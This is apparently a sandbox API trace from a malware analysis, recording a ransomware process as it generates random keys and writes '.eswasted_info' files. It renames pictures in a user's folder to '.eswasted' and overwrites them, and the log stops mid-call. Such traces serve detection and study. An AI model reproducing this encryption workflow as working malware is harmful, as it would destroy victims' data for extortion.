1 [0080.001] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0080.001] CloseHandle (hObject=0x108) returned 1 [0080.003] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7175f0 | out: hHeap=0x6d0000) returned 1 [0080.003] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.005] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.005] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.005] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\WpooFShPIrh.gif") returned 72 [0080.005] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x29a) returned 0x71ec18 [0080.005] lstrcpyW (in: lpString1=0x71eca8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.005] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x717b00 [0080.005] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.006] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x717b00 | out: pbBuffer=0x717b00) returned 1 [0080.006] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\WpooFShPIrh.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\wpoofshpirh.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.007] WriteFile (in: hFile=0x108, lpBuffer=0x717b00*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x717b00*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.008] SetEndOfFile (hFile=0x108) returned 1 [0080.008] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.008] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0080.008] lstrcpyW (in: lpString1=0x71eca8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.008] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\WpooFShPIrh.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\wpoofshpirh.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\WpooFShPIrh.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\wpoofshpirh.gif.eswasted")) returned 1 [0080.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\WpooFShPIrh.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\wpoofshpirh.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.010] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0080.012] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.013] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0080.013] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.013] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.014] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.014] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.025] SetEndOfFile (hFile=0x108) returned 1 [0080.028] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0080.028] CloseHandle (hObject=0x108) returned 1 [0080.030] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0080.030] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.031] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.031] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.031] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\xCdJ6enCl9H0dLZJxp.png") returned 79 [0080.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a8) returned 0x71ec18 [0080.031] lstrcpyW (in: lpString1=0x71ecb6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.031] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.031] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.068] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.068] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\xCdJ6enCl9H0dLZJxp.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\xcdj6encl9h0dlzjxp.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.074] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.076] SetEndOfFile (hFile=0x130) returned 1 [0080.076] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.076] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.076] lstrcpyW (in: lpString1=0x71ecb6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.076] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\xCdJ6enCl9H0dLZJxp.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\xcdj6encl9h0dlzjxp.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\xCdJ6enCl9H0dLZJxp.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\xcdj6encl9h0dlzjxp.png.eswasted")) returned 1 [0080.077] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\HllV98oj9oiBp\\xCdJ6enCl9H0dLZJxp.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hllv98oj9oibp\\xcdj6encl9h0dlzjxp.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.077] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0080.080] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.081] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.081] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.081] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.082] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.082] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.092] SetEndOfFile (hFile=0x130) returned 1 [0080.095] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.095] CloseHandle (hObject=0x130) returned 1 [0080.097] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0080.097] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.098] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.098] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.098] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l-zLaU_O.bmp") returned 55 [0080.099] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x278) returned 0x71ec18 [0080.099] lstrcpyW (in: lpString1=0x71ec86, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.099] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.099] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.100] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.100] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l-zLaU_O.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l-zlau_o.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.100] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.102] SetEndOfFile (hFile=0x130) returned 1 [0080.102] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.102] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.102] lstrcpyW (in: lpString1=0x71ec86, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.102] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l-zLaU_O.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l-zlau_o.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l-zLaU_O.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l-zlau_o.bmp.eswasted")) returned 1 [0080.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\l-zLaU_O.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\l-zlau_o.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0080.103] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.105] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.106] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.106] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.106] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.107] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.107] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.134] SetEndOfFile (hFile=0x130) returned 1 [0080.157] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.157] CloseHandle (hObject=0x130) returned 1 [0080.161] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0080.161] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.162] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.162] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.162] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LRqMP.bmp") returned 52 [0080.162] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x272) returned 0x71ec18 [0080.162] lstrcpyW (in: lpString1=0x71ec80, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.162] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.162] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.163] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.163] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.163] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LRqMP.bmp.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lrqmp.bmp.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.163] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.164] SetEndOfFile (hFile=0x130) returned 1 [0080.165] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.165] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.165] lstrcpyW (in: lpString1=0x71ec80, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.165] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LRqMP.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lrqmp.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LRqMP.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lrqmp.bmp.eswasted")) returned 1 [0080.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\LRqMP.bmp.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lrqmp.bmp.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0080.166] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.167] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.167] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.168] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.168] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.168] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.168] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.177] SetEndOfFile (hFile=0x130) returned 1 [0080.180] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.180] CloseHandle (hObject=0x130) returned 1 [0080.183] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0080.183] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.184] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.184] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\M_Ry1Ix1INQ5ve Qwz.jpg") returned 65 [0080.184] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x28c) returned 0x71ec18 [0080.184] lstrcpyW (in: lpString1=0x71ec9a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.184] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.184] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.185] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.185] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\M_Ry1Ix1INQ5ve Qwz.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\m_ry1ix1inq5ve qwz.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.186] WriteFile (in: hFile=0x130, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.187] SetEndOfFile (hFile=0x130) returned 1 [0080.187] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.187] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.187] lstrcpyW (in: lpString1=0x71ec9a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.187] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\M_Ry1Ix1INQ5ve Qwz.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\m_ry1ix1inq5ve qwz.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\M_Ry1Ix1INQ5ve Qwz.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\m_ry1ix1inq5ve qwz.jpg.eswasted")) returned 1 [0080.262] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\M_Ry1Ix1INQ5ve Qwz.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\m_ry1ix1inq5ve qwz.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0080.298] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.300] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fdc4*=0x70f058) returned 1 [0080.300] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.300] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.300] CryptAcquireContextW (in: phProv=0x114fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fb2c*=0x70f058) returned 1 [0080.301] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x114fb48 | out: pbBuffer=0x114fb48) returned 1 [0080.301] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.310] SetEndOfFile (hFile=0x130) returned 1 [0080.312] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0080.312] CloseHandle (hObject=0x130) returned 1 [0080.314] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71ec18 | out: hHeap=0x6d0000) returned 1 [0080.314] CryptAcquireContextW (in: phProv=0x114fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fe0c*=0x70f058) returned 1 [0080.315] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x114fe48 | out: pbBuffer=0x114fe48) returned 1 [0080.315] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.315] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\V1nHHUgt1CV2pletvExr.png") returned 67 [0080.315] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x290) returned 0x71ec18 [0080.315] lstrcpyW (in: lpString1=0x71ec9e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.315] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x735198 [0080.315] CryptAcquireContextW (in: phProv=0x114fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x114fde8*=0x70f058) returned 1 [0080.316] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x735198 | out: pbBuffer=0x735198) returned 1 [0080.316] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\V1nHHUgt1CV2pletvExr.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\v1nhhugt1cv2pletvexr.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0080.316] WriteFile (in: hFile=0x130, lpBuffer=0x735198*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x114fe04, lpOverlapped=0x0 | out: lpBuffer=0x735198*, lpNumberOfBytesWritten=0x114fe04*=0xa46, lpOverlapped=0x0) returned 1 [0080.318] SetEndOfFile (hFile=0x130) returned 1 [0080.318] SetFilePointer (in: hFile=0x130, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.318] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x735198 | out: hHeap=0x6d0000) returned 1 [0080.318] lstrcpyW (in: lpString1=0x71ec9e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\V1nHHUgt1CV2pletvExr.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\v1nhhugt1cv2pletvexr.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\V1nHHUgt1CV2pletvExr.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\v1nhhugt1cv2pletvexr.png.eswasted")) returned 1 [0080.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\V1nHHUgt1CV2pletvExr.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\v1nhhugt1cv2pletvexr.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.319] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0080.321] CryptAcquireContextW (in: phProv=0x114fdc4, szContainer=0x0, szProvider=0x0, 